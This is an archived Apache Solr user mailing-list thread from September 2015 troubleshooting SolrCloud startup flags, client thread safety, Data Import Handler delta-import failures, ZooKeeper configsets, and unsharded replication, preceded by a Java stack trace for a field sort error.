(qtp1256054824-13) [c:collection1 s:shard1 r:core_node2 x:collection1_shard1_replica4] o.a.s.c.S.Request [collection1_shard1_replica4] webapp=/solr path=/select params={sort=_docid_+asc=*:*=false=javabin=2=0} status=500 QTime=1 2015-09-24 01:43:33.668 ERROR (qtp1256054824-13) [c:collection1 s:shard1 r:core_node2 x:collection1_shard1_replica4] o.a.s.s.SolrDispatchFilter null:java.lang.IllegalStateException: Type mismatch: pubdatetime was indexed with multiple values per document, use SORTED_SET instead at org.apache.lucene.uninverting.FieldCacheImpl$SortedDocValuesCache.createValue(FieldCacheImpl.java:679) at org.apache.lucene.uninverting.FieldCacheImpl$Cache.get(FieldCacheImpl.java:190) at org.apache.lucene.uninverting.FieldCacheImpl.getTermsIndex(FieldCacheImpl.java:647) at org.apache.lucene.uninverting.FieldCacheImpl.getTermsIndex(FieldCacheImpl.java:627) at org.apache.lucene.uninverting.UninvertingReader.getSortedDocValues(UninvertingReader.java:257) at org.apache.lucene.index.MultiDocValues.getSortedValues(MultiDocValues.java:316) at org.apache.lucene.index.SlowCompositeReaderWrapper.getSortedDocValues(SlowCompositeReaderWrapper.java:125) at org.apache.lucene.index.DocValues.getSortedSet(DocValues.java:304) at org.apache.solr.search.function.OrdFieldSource.getValues(OrdFieldSource.java:99) at org.apache.lucene.queries.function.FunctionQuery$AllScorer.(FunctionQuery.java:116) at org.apache.lucene.queries.function.FunctionQuery$FunctionWeight.scorer(FunctionQuery.java:93) at org.apache.lucene.search.BooleanWeight.scorer(BooleanWeight.java:274) at org.apache.lucene.search.Weight.bulkScorer(Weight.java:135) at org.apache.lucene.search.BooleanWeight.bulkScorer(BooleanWeight.java:256) at org.apache.lucene.search.IndexSearcher.search(IndexSearcher.java:769) at org.apache.lucene.search.IndexSearcher.search(IndexSearcher.java:486) at org.apache.solr.search.SolrIndexSearcher.buildAndRunCollectorChain(SolrIndexSearcher.java:200) at org.apache.solr.search.SolrIndexSearcher.getDocListNC(SolrIndexSearcher.java:1682) at org.apache.solr.search.SolrIndexSearcher.getDocListC(SolrIndexSearcher.java:1501) at org.apache.solr.search.SolrIndexSearcher.search(SolrIndexSearcher.java:555) at org.apache.solr.handler.component.QueryComponent.process(QueryComponent.java:522) at org.apache.solr.handler.component.SearchHandler.handleRequestBody(SearchHandler.java:277) at org.apache.solr.handler.RequestHandlerBase.handleRequest(RequestHandlerBase.java:143) at org.apache.solr.core.SolrCore.execute(SolrCore.java:2068) at org.apache.solr.servlet.HttpSolrCall.execute(HttpSolrCall.java:669) at org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:462) at org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:210) at org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:179) at org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1652) at org.eclipse.jetty.servlet.ServletHandler.doHandle(ServletHandler.java:585) at org.eclipse.jetty.server.handler.ScopedHandler.handle(ScopedHandler.java:143) at org.eclipse.jetty.security.SecurityHandler.handle(SecurityHandler.java:577) at org.eclipse.jetty.server.session.SessionHandler.doHandle(SessionHandler.java:223) at org.eclipse.jetty.server.handler.ContextHandler.doHandle(ContextHandler.java:1127) at org.eclipse.jetty.servlet.ServletHandler.doScope(ServletHandler.java:515) at org.eclipse.jetty.server.session.SessionHandler.doScope(SessionHandler.java:185) at org.eclipse.jetty.server.handler.ContextHandler.doScope(ContextHandler.java:1061) at org.eclipse.jetty.server.handler.ScopedHandler.handle(ScopedHandler.java:141) at org.eclipse.jetty.server.handler.ContextHandlerCollection.handle(ContextHandlerCollection.java:215) at org.eclipse.jetty.server.handler.HandlerCollection.handle(HandlerCollection.java:110) at org.eclipse.jetty.server.handler.HandlerWrapper.handle(HandlerWrapper.java:97) at org.eclipse.jetty.server.Server.handle(Server.java:499) at org.eclipse.jetty.server.HttpChannel.handle(HttpChannel.java:310) at org.eclipse.jetty.server.HttpConnection.onFillable(HttpConnection.java:257) at org.eclipse.jetty.io.AbstractConnection$2.run(AbstractConnection.java:540) at org.eclipse.jetty.util.thread.QueuedThreadPool.runJob(QueuedThreadPool.java:635) at org.eclipse.jetty.util.thread.QueuedThreadPool$3.run(QueuedThreadPool.java:555) at java.lang.Thread.run(Thread.java:745)
Re: SolrCloud Startup question
Thanks Anshum On Mon, Sep 21, 2015 at 6:23 PM, Anshum Gupta <ans...@anshumgupta.net> wrote: > CloudSolrClient is thread safe and it is highly recommended you reuse the > client. > > If you are providing an HttpClient instance while constructing, make sure > that the HttpClient uses a multi-threaded connection manager. > > On Mon, Sep 21, 2015 at 3:13 PM, Ravi Solr <ravis...@gmail.com> wrote: > > > Thank you Anshum & Upayavira. > > > > BTW do any of you guys know if CloudSolrClient is ThreadSafe ?? > > > > Thanks, > > > > Ravi Kiran Bhaskar > > > > On Monday, September 21, 2015, Anshum Gupta <ans...@anshumgupta.net> > > wrote: > > > > > Hi Ravi, > > > > > > I just tried it out and here's my understanding: > > > > > > 1. Starting Solr with -c starts Solr in cloud mode. This is used to > start > > > Solr with an embedded zookeeper. > > > 2. Starting Solr with -z starts Solr in cloud mode, with the zk > > connection > > > string you specify. You don't need to explicitly specify -c in this > case. > > > The help text there needs a bit of fixing though > > > > > > * -zZooKeeper connection string; only used when running in > > > SolrCloud mode using -c* > > > * To launch an embedded ZooKeeper instance, don't > pass > > > this parameter.* > > > > > > *"only used when running in SolrCloud mode using -c" *needs to be > > rephrased > > > or removed. Can you create a JIRA for the same? > > > > > > > > > On Mon, Sep 21, 2015 at 1:35 PM, Ravi Solr <ravis...@gmail.com > > > <javascript:;>> wrote: > > > > > > > Can somebody kindly help me understand the difference between the > > > following > > > > startup calls ? > > > > > > > > ./solr start -p -s /solr/home -z zk1:2181,zk2:2181,zk3:2181 > > > > > > > > Vs > > > > > > > > ./solr start -c -p -s /solr/home -z zk1:2181,zk2:2181,zk3:2181 > > > > > > > > What happens if i don't pass the "-c" option ?? I read the > > documentation > > > > but got more confused, I do run a ZK ensemble of 3 instances. FYI my > > > cloud > > > > seems to work fine and teh Admin UI shows Cloud graph just fine, but > I > > > want > > > > to just make sure I am doing the right thing and not missing any > > nuance. > > > > > > > > The following is form documention on cwiki. > > > > --- > > > > > > > > "Start Solr in SolrCloud mode, which will also launch the embedded > > > > ZooKeeper instance included with Solr. > > > > > > > > This option can be shortened to simply -c. > > > > > > > > If you are already running a ZooKeeper ensemble that you want to use > > > > instead of the embedded (single-node) ZooKeeper, you should also pass > > the > > > > -z parameter." > > > > > > > > - > > > > > > > > Thanks > > > > > > > > Ravi Kiran Bhaskar > > > > > > > > > > > > > > > > -- > > > Anshum Gupta > > > > > > > > > -- > Anshum Gupta >
Re: SolrCloud Startup question
Thank you Anshum & Upayavira. BTW do any of you guys know if CloudSolrClient is ThreadSafe ?? Thanks, Ravi Kiran Bhaskar On Monday, September 21, 2015, Anshum Gupta <ans...@anshumgupta.net> wrote: > Hi Ravi, > > I just tried it out and here's my understanding: > > 1. Starting Solr with -c starts Solr in cloud mode. This is used to start > Solr with an embedded zookeeper. > 2. Starting Solr with -z starts Solr in cloud mode, with the zk connection > string you specify. You don't need to explicitly specify -c in this case. > The help text there needs a bit of fixing though > > * -zZooKeeper connection string; only used when running in > SolrCloud mode using -c* > * To launch an embedded ZooKeeper instance, don't pass > this parameter.* > > *"only used when running in SolrCloud mode using -c" *needs to be rephrased > or removed. Can you create a JIRA for the same? > > > On Mon, Sep 21, 2015 at 1:35 PM, Ravi Solr <ravis...@gmail.com > <javascript:;>> wrote: > > > Can somebody kindly help me understand the difference between the > following > > startup calls ? > > > > ./solr start -p -s /solr/home -z zk1:2181,zk2:2181,zk3:2181 > > > > Vs > > > > ./solr start -c -p -s /solr/home -z zk1:2181,zk2:2181,zk3:2181 > > > > What happens if i don't pass the "-c" option ?? I read the documentation > > but got more confused, I do run a ZK ensemble of 3 instances. FYI my > cloud > > seems to work fine and teh Admin UI shows Cloud graph just fine, but I > want > > to just make sure I am doing the right thing and not missing any nuance. > > > > The following is form documention on cwiki. > > --- > > > > "Start Solr in SolrCloud mode, which will also launch the embedded > > ZooKeeper instance included with Solr. > > > > This option can be shortened to simply -c. > > > > If you are already running a ZooKeeper ensemble that you want to use > > instead of the embedded (single-node) ZooKeeper, you should also pass the > > -z parameter." > > > > - > > > > Thanks > > > > Ravi Kiran Bhaskar > > > > > > -- > Anshum Gupta >
SolrCloud Startup question
Can somebody kindly help me understand the difference between the following startup calls ? ./solr start -p -s /solr/home -z zk1:2181,zk2:2181,zk3:2181 Vs ./solr start -c -p -s /solr/home -z zk1:2181,zk2:2181,zk3:2181 What happens if i don't pass the "-c" option ?? I read the documentation but got more confused, I do run a ZK ensemble of 3 instances. FYI my cloud seems to work fine and teh Admin UI shows Cloud graph just fine, but I want to just make sure I am doing the right thing and not missing any nuance. The following is form documention on cwiki. --- "Start Solr in SolrCloud mode, which will also launch the embedded ZooKeeper instance included with Solr. This option can be shortened to simply -c. If you are already running a ZooKeeper ensemble that you want to use instead of the embedded (single-node) ZooKeeper, you should also pass the -z parameter." - Thanks Ravi Kiran Bhaskar
Re: SolrCloud DIH issue
Yes Upayavira, that's exactly what prompted me to ask Erick as soon as I read https://cwiki.apache.org/confluence/display/solr/Config+Sets Erick, Regarding my delta-import not working I do see the dataimport.properties in zookeeper. after I "upconfig" and "linkconfig" my conf files into ZK...see below [zk: localhost: (CONNECTED) 0] ls /configs/xx [admin-extra.menu-top.html, person-synonyms.txt, entity-stopwords.txt, protwords.txt, location-synonyms.txt, solrconfig.xml, organization-synonyms.txt, stopwords.txt, spellings.txt, dataimport.properties, admin-extra.html, xslt, synonyms.txt, scripts.conf, subject-synonyms.txt, elevate.xml, admin-extra.menu-bottom.html, solr-import-config.xml, clustering, schema.xml] However, when I look into dataimport.properties in my 'conf' folder it hasn't updated even after running full-import on Sep 19 2015 1:00AM successfully and subsequent delta-import on Sep 20 2015 11:AM which did not import newer docs, This prompted me to look into the dataimport.properties in the conf folder...the details are shown below, you can clearly see the dates are quite a bit off. [@y conf]$ cat dataimport.properties #Tue Sep 15 18:11:17 UTC 2015 reindex-docs.last_index_time=2015-09-15 18\:11\:16 last_index_time=2015-09-15 18\:11\:16 sep.last_index_time=2014-03-24 13\:41\:46 I saw some JIRA tickets about different location of dataimport.properties for SolrCloud but couldnt find the path where it stores...Anybody have idea where it stores it ? Thanks Ravi Kiran Bhaskar On Sun, Sep 20, 2015 at 5:28 AM, Upayavira <u...@odoko.co.uk> wrote: > It is worth noting that the ref guide page on configsets refers to > non-cloud mode (a useful new feature) whereas people may confuse this > with configsets in cloud mode, which use Zookeeper. > > Upayavira > > On Sun, Sep 20, 2015, at 04:59 AM, Ravi Solr wrote: > > Cant thank you enough for clarifying it at length. Yeah its pretty > > confusing even for experienced Solr users. I used the upconfig and > > linkconfig commands to update 4 collections into zookeeper...As you > > described, I lucked out as I used the same name for configset and the > > collection and hence did not have to use the collections API :-) > > > > Thanks, > > > > Ravi Kiran Bhaskar > > > > On Sat, Sep 19, 2015 at 11:22 PM, Erick Erickson > > <erickerick...@gmail.com> > > wrote: > > > > > Let's back up a second. Configsets are what _used_ to be in the conf > > > directory for each core on a local drive, it's just that they're now > > > kept up on Zookeeper. Otherwise, you'd have to put them on each > > > instance in SolrCloud, and bringing up a new replica on a new machine > > > would look a lot like adding a core with the old core admin API. > > > > > > So instead, configurations are kept on zookeeper. A config set > > > consists of, essentially, a named old-style "conf" directory. There's > > > no a-priori limit to the number of config sets you can have. Look in > > > the admin UI, Cloud>>tree>>configs and you'll see each name you've > > > pushed to ZK. If you explore that tree, you'll see a lot of old > > > familiar faces, schema.xml, solrconfig.xml, etc. > > > > > > So now we come to associating configs with collections. You've > > > probably done one of the examples where some things happen under the > > > covers, including explicitly pushing the configset to Zookeeper. > > > Currently, there's no option in the bin/solr script to push a config, > > > although I know there's a JIRA to do that. > > > > > > So, to put a new config set up you currently need to use the zkCli.sh > > > script see: > > > > https://cwiki.apache.org/confluence/display/solr/Command+Line+Utilities, > > > the "upconfig" command. That pushes the configset up to ZK and gives > > > it a name. > > > > > > Now, you create a collection and it needs a configset stored in ZK. > > > It's a little tricky in that if you do _not_ explicitly specify a > > > configest (using the collection.configName parameter to the > > > collections API CREATE command), then by default it'll look for a > > > configset with the same name as the collection. If it doesn't find > > > one, _and_ there is one and only one configset, then it'll use that > > > one (personally I find that confusing, but that's the way it works). > > > See: https://cwiki.apache.org/confluence/display/solr/Collections+API > > > > > > If you have two or more configsets in ZK, then either the configset > > > name has to be identical to the collection na
Re: SolrCloud DIH issue
Thanks Erick, I will report back once the reindex is finished. Oh, your answer reminded me of another question - Regarding configsets the documentation says "On a multicore Solr instance, you may find that you want to share configuration between a number of different cores." Can the same be used to push disparate mutually exclusive configs ? I ask this as I have 4 mutually exclusive apps each with a 4 single core index on a single machine which I am trying to convert to SolrCloud with single shard approach. Just being lazy and trying to find a way to update and link configs to zookeeper ;-) Thanks Rvai Kiran Bhaskar On Sat, Sep 19, 2015 at 6:54 PM, Erick Erickson <erickerick...@gmail.com> wrote: > Just pushing up the entire configset would be easiest, but the > Zookeeper command line tools allow you to push up a single > file if you want. > > Yeah, it puzzles me too that the import worked yesterday, not really > sure what happened, the file shouldn't just disappear > > Erick > > On Sat, Sep 19, 2015 at 2:46 PM, Ravi Solr <ravis...@gmail.com> wrote: > > Thank you for the prompt response Erick. I did a full-import yesterday, > you > > are correct that I did not push dataimport.properties to ZK, should it > have > > not worked even for a full import ?. You may be right about 'clean' > option, > > I will reindex again today. BTW how do we push a single file to a > specific > > config name in zookeeper ? > > > > > > Thanks, > > > > Ravi Kiran Bhaskar > > > > > > On Sat, Sep 19, 2015 at 1:48 PM, Erick Erickson <erickerick...@gmail.com > > > > wrote: > > > >> Could not read DIH properties from > >> /configs/sitesearchcore/dataimport.properties > >> > >> This looks like somehow you didn't push this file up to Zookeeper. You > >> can check what files are there in the admin UI. How you indexed > >> yesterday is a mystery though, unless somehow this file was removed > >> from ZK. > >> > >> As for why you lost all the docs, my suspicion is that you have the > >> clean param set up for delta import > >> > >> FWIW, > >> Erick > >> > >> On Sat, Sep 19, 2015 at 10:36 AM, Ravi Solr <ravis...@gmail.com> wrote: > >> > I am facing a weird problem. As part of upgrade from 4.7.2 > (Master-Slave) > >> > to 5.3.0 (Solrcloud) I re-indexed 1.5 million records via DIH using > >> > SolrEntityProcessor yesterday, all of them indexed properly. Today > >> morning > >> > I just ran the DIH again with delta import and I lost all docs...what > am > >> I > >> > missing ? Did anybody face similar issue ? > >> > > >> > Here are the errors in the logs > >> > > >> > 9/19/2015, 2:41:17 AM ERROR null SolrCore Previous SolrRequestInfo was > >> not > >> > closed! > >> > req=waitSearcher=true= > >> > http://10.128.159.32:8983/solr/sitesearchcore/=FROMLEADER=true=true=javabin=false_end_point=true=2=false > >> > 9/19/2015, > >> > 2:41:17 AM ERROR null SolrCore prev == info : false 9/19/2015, > 2:41:17 AM > >> > WARN null ZKPropertiesWriter Could not read DIH properties from > >> > /configs/sitesearchcore/dataimport.properties :class > >> > org.apache.zookeeper.KeeperException$NoNodeException > >> > > >> > org.apache.zookeeper.KeeperException$NoNodeException: KeeperErrorCode > >> > = NoNode for /configs/sitesearchcore/dataimport.properties > >> > at > >> org.apache.zookeeper.KeeperException.create(KeeperException.java:111) > >> > at > >> org.apache.zookeeper.KeeperException.create(KeeperException.java:51) > >> > at org.apache.zookeeper.ZooKeeper.getData(ZooKeeper.java:1155) > >> > at > >> org.apache.solr.common.cloud.SolrZkClient.getData(SolrZkClient.java:349) > >> > at > >> > org.apache.solr.handler.dataimport.ZKPropertiesWriter.readIndexerProperties(ZKPropertiesWriter.java:91) > >> > at > >> > org.apache.solr.handler.dataimport.ZKPropertiesWriter.persist(ZKPropertiesWriter.java:65) > >> > at > >> > org.apache.solr.handler.dataimport.DocBuilder.finish(DocBuilder.java:307) > >> > at > >> > org.apache.solr.handler.dataimport.DocBuilder.execute(DocBuilder.java:253) > >> > at > >> > org.apache.solr.handler.dataimport.DataImporter.doFullImport(DataImporter.java:416) > >> > at > >> > org.apache.solr.handler.dataimport.DataImporter.runCmd(DataImporter.java:480) > >> > at > >> > org.apache.solr.handler.dataimport.DataImporter$1.run(DataImporter.java:461) > >> > > >> > 9/19/2015, 11:16:43 AM ERROR null SolrCore Previous SolrRequestInfo > was > >> not > >> > closed! > >> > req=waitSearcher=true= > >> > http://10.128.159.32:8983/solr/sitesearchcore/=FROMLEADER=true=true=javabin=false_end_point=true=2=false > >> > 9/19/2015, > >> > 11:16:43 AM ERROR null SolrCore prev == info : false > >> > > >> > > >> > > >> > Thanks > >> > > >> > Ravi Kiran Bhaskar > >> >
Re: SolrCloud DIH issue
Cant thank you enough for clarifying it at length. Yeah its pretty confusing even for experienced Solr users. I used the upconfig and linkconfig commands to update 4 collections into zookeeper...As you described, I lucked out as I used the same name for configset and the collection and hence did not have to use the collections API :-) Thanks, Ravi Kiran Bhaskar On Sat, Sep 19, 2015 at 11:22 PM, Erick Erickson <erickerick...@gmail.com> wrote: > Let's back up a second. Configsets are what _used_ to be in the conf > directory for each core on a local drive, it's just that they're now > kept up on Zookeeper. Otherwise, you'd have to put them on each > instance in SolrCloud, and bringing up a new replica on a new machine > would look a lot like adding a core with the old core admin API. > > So instead, configurations are kept on zookeeper. A config set > consists of, essentially, a named old-style "conf" directory. There's > no a-priori limit to the number of config sets you can have. Look in > the admin UI, Cloud>>tree>>configs and you'll see each name you've > pushed to ZK. If you explore that tree, you'll see a lot of old > familiar faces, schema.xml, solrconfig.xml, etc. > > So now we come to associating configs with collections. You've > probably done one of the examples where some things happen under the > covers, including explicitly pushing the configset to Zookeeper. > Currently, there's no option in the bin/solr script to push a config, > although I know there's a JIRA to do that. > > So, to put a new config set up you currently need to use the zkCli.sh > script see: > https://cwiki.apache.org/confluence/display/solr/Command+Line+Utilities, > the "upconfig" command. That pushes the configset up to ZK and gives > it a name. > > Now, you create a collection and it needs a configset stored in ZK. > It's a little tricky in that if you do _not_ explicitly specify a > configest (using the collection.configName parameter to the > collections API CREATE command), then by default it'll look for a > configset with the same name as the collection. If it doesn't find > one, _and_ there is one and only one configset, then it'll use that > one (personally I find that confusing, but that's the way it works). > See: https://cwiki.apache.org/confluence/display/solr/Collections+API > > If you have two or more configsets in ZK, then either the configset > name has to be identical to the collection name (if you don't specify > collection.configName), _or_ you specify collection.configName at > create time. > > NOTE: there are _no_ config files on the local disk! When a replica of > a collection loads, it "knows" what collection it's part of and pulls > the corresponding configset from ZK. > > So typically the process is this. > > you create the config set by editing all the usual suspects, schema.xml, > solrconfig.xml, DIH config etc. > > you put those configuration files into some version control system (you > are using one, right?) > > you push the configs to Zookeeper > > you create the collection > > you figure out you need to change the configs so you > > check the code out of your version control > > edit them > > put the current version back into version control > > push the configs up to zookeeper, overwriting the ones already > there with that name > > reload the collection or bounce all the servers. As each replica > in the collection comes up, > it downloads the latest configs from Zookeeper to memory (not to > disk) and uses them. > > Seems like a long drawn-out process, but pretty soon it's automatic. > And really, the only extra step is the push to Zookeeper, the rest is > just like old-style cores with the exception that you don't have to > manually push all the configs to all the machines hosting cores. > > Notice that I have mostly avoided talking about "cores" here. Although > it's true that a replica in a collection is just another core, it's > "special" in that it has certain very specific properties set. I > _strongly_ advise you stop thinking about old-style Solr cores and > instead thing about collections and replicas. And above all, do _not_ > use the admin core API to try to create members of a collection > (cores), use the collections API to ADDREPLICA/DELETEREPLICA instead. > Loading/unloading cores is less "fraught", but I try to avoid that too > and use > > Best, > Erick > > On Sat, Sep 19, 2015 at 9:08 PM, Ravi Solr <ravis...@gmail.com> wrote: > > Thanks Erick, I will report back once the reindex is finished. Oh, your > > answer reminded me of another question - Regarding configsets the > > documentation sa
Re: SolrCloud DIH issue
Thank you for the prompt response Erick. I did a full-import yesterday, you are correct that I did not push dataimport.properties to ZK, should it have not worked even for a full import ?. You may be right about 'clean' option, I will reindex again today. BTW how do we push a single file to a specific config name in zookeeper ? Thanks, Ravi Kiran Bhaskar On Sat, Sep 19, 2015 at 1:48 PM, Erick Erickson <erickerick...@gmail.com> wrote: > Could not read DIH properties from > /configs/sitesearchcore/dataimport.properties > > This looks like somehow you didn't push this file up to Zookeeper. You > can check what files are there in the admin UI. How you indexed > yesterday is a mystery though, unless somehow this file was removed > from ZK. > > As for why you lost all the docs, my suspicion is that you have the > clean param set up for delta import > > FWIW, > Erick > > On Sat, Sep 19, 2015 at 10:36 AM, Ravi Solr <ravis...@gmail.com> wrote: > > I am facing a weird problem. As part of upgrade from 4.7.2 (Master-Slave) > > to 5.3.0 (Solrcloud) I re-indexed 1.5 million records via DIH using > > SolrEntityProcessor yesterday, all of them indexed properly. Today > morning > > I just ran the DIH again with delta import and I lost all docs...what am > I > > missing ? Did anybody face similar issue ? > > > > Here are the errors in the logs > > > > 9/19/2015, 2:41:17 AM ERROR null SolrCore Previous SolrRequestInfo was > not > > closed! > > req=waitSearcher=true= > http://10.128.159.32:8983/solr/sitesearchcore/=FROMLEADER=true=true=javabin=false_end_point=true=2=false > > 9/19/2015, > > 2:41:17 AM ERROR null SolrCore prev == info : false 9/19/2015, 2:41:17 AM > > WARN null ZKPropertiesWriter Could not read DIH properties from > > /configs/sitesearchcore/dataimport.properties :class > > org.apache.zookeeper.KeeperException$NoNodeException > > > > org.apache.zookeeper.KeeperException$NoNodeException: KeeperErrorCode > > = NoNode for /configs/sitesearchcore/dataimport.properties > > at > org.apache.zookeeper.KeeperException.create(KeeperException.java:111) > > at > org.apache.zookeeper.KeeperException.create(KeeperException.java:51) > > at org.apache.zookeeper.ZooKeeper.getData(ZooKeeper.java:1155) > > at > org.apache.solr.common.cloud.SolrZkClient.getData(SolrZkClient.java:349) > > at > org.apache.solr.handler.dataimport.ZKPropertiesWriter.readIndexerProperties(ZKPropertiesWriter.java:91) > > at > org.apache.solr.handler.dataimport.ZKPropertiesWriter.persist(ZKPropertiesWriter.java:65) > > at > org.apache.solr.handler.dataimport.DocBuilder.finish(DocBuilder.java:307) > > at > org.apache.solr.handler.dataimport.DocBuilder.execute(DocBuilder.java:253) > > at > org.apache.solr.handler.dataimport.DataImporter.doFullImport(DataImporter.java:416) > > at > org.apache.solr.handler.dataimport.DataImporter.runCmd(DataImporter.java:480) > > at > org.apache.solr.handler.dataimport.DataImporter$1.run(DataImporter.java:461) > > > > 9/19/2015, 11:16:43 AM ERROR null SolrCore Previous SolrRequestInfo was > not > > closed! > > req=waitSearcher=true= > http://10.128.159.32:8983/solr/sitesearchcore/=FROMLEADER=true=true=javabin=false_end_point=true=2=false > > 9/19/2015, > > 11:16:43 AM ERROR null SolrCore prev == info : false > > > > > > > > Thanks > > > > Ravi Kiran Bhaskar >
SolrCloud DIH issue
I am facing a weird problem. As part of upgrade from 4.7.2 (Master-Slave) to 5.3.0 (Solrcloud) I re-indexed 1.5 million records via DIH using SolrEntityProcessor yesterday, all of them indexed properly. Today morning I just ran the DIH again with delta import and I lost all docs...what am I missing ? Did anybody face similar issue ? Here are the errors in the logs 9/19/2015, 2:41:17 AM ERROR null SolrCore Previous SolrRequestInfo was not closed! req=waitSearcher=true=http://10.128.159.32:8983/solr/sitesearchcore/=FROMLEADER=true=true=javabin=false_end_point=true=2=false 9/19/2015, 2:41:17 AM ERROR null SolrCore prev == info : false 9/19/2015, 2:41:17 AM WARN null ZKPropertiesWriter Could not read DIH properties from /configs/sitesearchcore/dataimport.properties :class org.apache.zookeeper.KeeperException$NoNodeException org.apache.zookeeper.KeeperException$NoNodeException: KeeperErrorCode = NoNode for /configs/sitesearchcore/dataimport.properties at org.apache.zookeeper.KeeperException.create(KeeperException.java:111) at org.apache.zookeeper.KeeperException.create(KeeperException.java:51) at org.apache.zookeeper.ZooKeeper.getData(ZooKeeper.java:1155) at org.apache.solr.common.cloud.SolrZkClient.getData(SolrZkClient.java:349) at org.apache.solr.handler.dataimport.ZKPropertiesWriter.readIndexerProperties(ZKPropertiesWriter.java:91) at org.apache.solr.handler.dataimport.ZKPropertiesWriter.persist(ZKPropertiesWriter.java:65) at org.apache.solr.handler.dataimport.DocBuilder.finish(DocBuilder.java:307) at org.apache.solr.handler.dataimport.DocBuilder.execute(DocBuilder.java:253) at org.apache.solr.handler.dataimport.DataImporter.doFullImport(DataImporter.java:416) at org.apache.solr.handler.dataimport.DataImporter.runCmd(DataImporter.java:480) at org.apache.solr.handler.dataimport.DataImporter$1.run(DataImporter.java:461) 9/19/2015, 11:16:43 AM ERROR null SolrCore Previous SolrRequestInfo was not closed! req=waitSearcher=true=http://10.128.159.32:8983/solr/sitesearchcore/=FROMLEADER=true=true=javabin=false_end_point=true=2=false 9/19/2015, 11:16:43 AM ERROR null SolrCore prev == info : false Thanks Ravi Kiran Bhaskar
Re: SolrCloud clarification/Question
Thank you very much Sameer, Erick and Upayavira. I got the solr cloud working !!! Hurray !! Cheers Ravi Kiran Bhaskar On Thu, Sep 17, 2015 at 3:10 AM, Upayavira <u...@odoko.co.uk> wrote: > and replicationFactor is the number of copies of your data, not the > number of servers marked 'replica'. So as has been said, if you have one > leader, and three replicas, your replicationFactor will be 4. > > Upayavira > > On Thu, Sep 17, 2015, at 03:29 AM, Erick Erickson wrote: > > Ravi: > > > > Sameer is correct on how to get it done in one go. > > > > Don't get too hung up on replicationFactor. You can always > > ADDREPLICA after the collection is created if you need to. > > > > Best, > > Erick > > > > > > On Wed, Sep 16, 2015 at 12:44 PM, Sameer Maggon > > <sam...@measuredsearch.com> wrote: > > > I just gave an example API call, but for your scenario, the > > > replicationFactor will be 4 (replicationFactor=4). In this way, all 4 > > > machines will have the same copy of the data and you can put an LB in > front > > > of those 4 machines. > > > > > > On Wed, Sep 16, 2015 at 12:00 PM, Ravi Solr <ravis...@gmail.com> > wrote: > > > > > >> OK...I understood numShards=1, when you say replicationFactor=2 what > does > > >> it mean ? I have 4 machines, then, only 3 copies of data (1 at leader > and 2 > > >> replicas) ?? so am i not under utilizing one machine ? > > >> > > >> I was more thinking in the lines of a Mesh connectivity format i.e. > > >> everybody has others copy so that I can put all 4 machines behind a > Load > > >> Balancer...Is that a wrong way to look at it ? > > >> > > >> Thanks > > >> > > >> Ravi Kiran > > >> > > >> On Wed, Sep 16, 2015 at 2:51 PM, Sameer Maggon < > sam...@measuredsearch.com> > > >> wrote: > > >> > > >> > You'll have to say numShards=1 and replicationFactor=2. > > >> > > > >> > http:// > > >> > > > >> > > > >> > [hostname]:8983/solr/admin/collections?action=CREATE=test=test=1=2 > > >> > > > >> > On Wed, Sep 16, 2015 at 11:23 AM, Ravi Solr <ravis...@gmail.com> > wrote: > > >> > > > >> > > Thank you very much for responding Sameer so numShards=0 and > > >> > > replicationFactr=4 if I have 4 machines ?? > > >> > > > > >> > > Thanks > > >> > > > > >> > > Ravi Kiran Bhaskar > > >> > > > > >> > > On Wed, Sep 16, 2015 at 12:56 PM, Sameer Maggon < > > >> > sam...@measuredsearch.com > > >> > > > > > >> > > wrote: > > >> > > > > >> > > > Absolutely. You can have a collection with just replicas and no > > >> shards > > >> > > for > > >> > > > redundancy and have a load balancer in front of it that removes > the > > >> > > > dependency on a single node. One of them will assume the role > of a > > >> > > leader, > > >> > > > and in case that leader goes down, one of the replicas will be > > >> elected > > >> > > as a > > >> > > > leader and your application will be fine. > > >> > > > > > >> > > > Thanks, > > >> > > > > > >> > > > On Wed, Sep 16, 2015 at 9:44 AM, Ravi Solr <ravis...@gmail.com> > > >> wrote: > > >> > > > > > >> > > > > Hello, > > >> > > > > We are trying to move away from Master-Slave > configuration > > >> > to > > >> > > a > > >> > > > > SolrCloud environment. I have a couple of questions. > Currently in > > >> the > > >> > > > > Master-Slave setup we have 4 Machines 2 of which are indexers > and 2 > > >> > of > > >> > > > them > > >> > > > > are query servers. The query servers are fronted via Load > Balancer. > > >> > > > > > > >> > > > > There are 3 solr cores for 3 different/separate applications > > >> > (mutually > > >> > > > > exclusive). Each core is a complete index of all docs (i.e. > the > > >> data > > >> > is > > >> > > > not > > >> > > > > sharded). > > >> > > > > > > >> > > > > We intend to keep it in a non-sharded mode even after > the > > >> > > SolrCloud > > >> > > > > mode.The prime motivation to move to cloud is to effectively > use > > >> all > > >> > > > > servers for indexing and querying (read fault > tolerant/redundant). > > >> > > > > > > >> > > > > So, the real question is, can SolrCloud be used without > shards ? > > >> > i.e. a > > >> > > > > "collection" resides entirely on one machine rather than > > >> partitioning > > >> > > > data > > >> > > > > onto different machines ? > > >> > > > > > > >> > > > > Thanks > > >> > > > > > > >> > > > > Ravi Kiran Bhaskar > > >> > > > > > > >> > > > > > >> > > > > > >> > > > > > >> > > > -- > > >> > > > *Sameer Maggon* > > >> > > > Measured Search > > >> > > > c: 310.344.7266 > > >> > > > www.measuredsearch.com <http://measuredsearch.com> > > >> > > > > > >> > > > > >> > > > >> > > > >> > > > >> > -- > > >> > *Sameer Maggon* > > >> > Measured Search > > >> > c: 310.344.7266 > > >> > www.measuredsearch.com <http://measuredsearch.com> > > >> > > > >> > > > > > > > > > > > > -- > > > *Sameer Maggon* > > > Measured Search > > > c: 310.344.7266 > > > www.measuredsearch.com <http://measuredsearch.com> >
SolrCloud clarification/Question
